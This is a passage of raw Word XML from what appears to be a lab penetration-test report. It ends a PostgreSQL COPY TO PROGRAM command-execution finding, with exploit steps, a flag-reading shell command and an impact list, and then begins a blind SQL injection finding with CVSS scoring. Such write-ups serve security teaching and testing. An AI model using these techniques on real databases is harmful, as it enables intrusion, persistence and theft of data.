            <wp:docPr id="1270738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38792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4910859" cy="2850766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="323EF79D" w14:textId="69EDA175" w:rsidR="00E13696" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>5.PostgreSQL executes 'cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">/flag.txt' as an OS shell command and inserts the output into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>temp_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE04B9" w14:textId="32DB8800" w:rsidR="00E13696" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>6.The SELECT statement returns the flag content, which Flask renders in the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7FA03" w14:textId="31A5708C" w:rsidR="00E13696" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>7.The exploit.py script parses the HTML-encoded response and prints the captured flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3EFF89" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="61DDF852" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Exploit Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C3B8E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python vuln1/solve/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD58149" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="32CDD165" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6DD8B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Flag captured: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_rce_copy_to_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDECC5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="7A012225" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Impact Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887EAD1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful exploitation gives the attacker the ability to execute arbitrary OS commands inside the vuln1 container as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. The concrete impacts are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314813B1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Complete data exfiltration — read any file on the container filesystem, including database files, configuration, and credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352836E2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>File write capability — plant web shells, modify application code, or corrupt database files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CE3DD0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Lateral movement — pivot to other containers on lab-network (vuln2-mysql, vuln3-mongo) by reading their connection strings from environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2639DE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence — install a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> job via COPY TO PROGRAM to maintain access across container restarts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86C34D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service — kill the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> process or corrupt critical data files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB6AEA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="377181D4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>postgres_rce_copy_to_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E6E4C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A09A4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>4. Vulnerability 2 — Boolean-Based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C09C9E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26450A2E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-Based Blind SQL Injection — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>SecureBank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A443B4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE / CWE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CWE-89 — Improper Neutralization of Special Elements in SQL Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C624AF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Component: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>vuln2-app (Flask) + vuln2-db (MySQL 8.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A34AD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed Port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>5002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443A84A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="729BF7BF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 CVSS v3.1 Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C448F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector String: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>CVSS:3.1/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>AC:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>PR:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>UI:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>S:U</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/C:H/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>I:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>A:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E5F0AA1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>8.8 — HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F276C72" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E136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E13696" w14:paraId="46DD9061"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67846D3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</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F41FEC4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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01D7978C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="30B3190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F8ADC3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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2ED820" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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2605A3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Login endpoint is accessible over HTTP with no network restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="202383E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1D40113" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity</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D3A2672" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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AE1B682" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No timing dependencies or special conditions; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> response is deterministic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="768E609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88E7C1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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2F839F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None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D9408E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Login page is publicly accessible; no account needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="7541DC8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F1CC5B1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction</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DD8F7BC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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27A4B85F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully automated exploit; no victim action needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="20C8C23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B5A325" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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40B190" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unchanged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E8A32D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack stays within the database; no OS boundary crossed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="32F03A0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0CFEC7B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality</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3B01A7A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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25F49476" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All data in all tables can be exfiltrated character by character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="5C0E469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EFCDA1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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06936" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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C120A6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Injection is read-only in this scenario; write impact limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="1B75369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2AB6D0DE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability</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277AF76" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
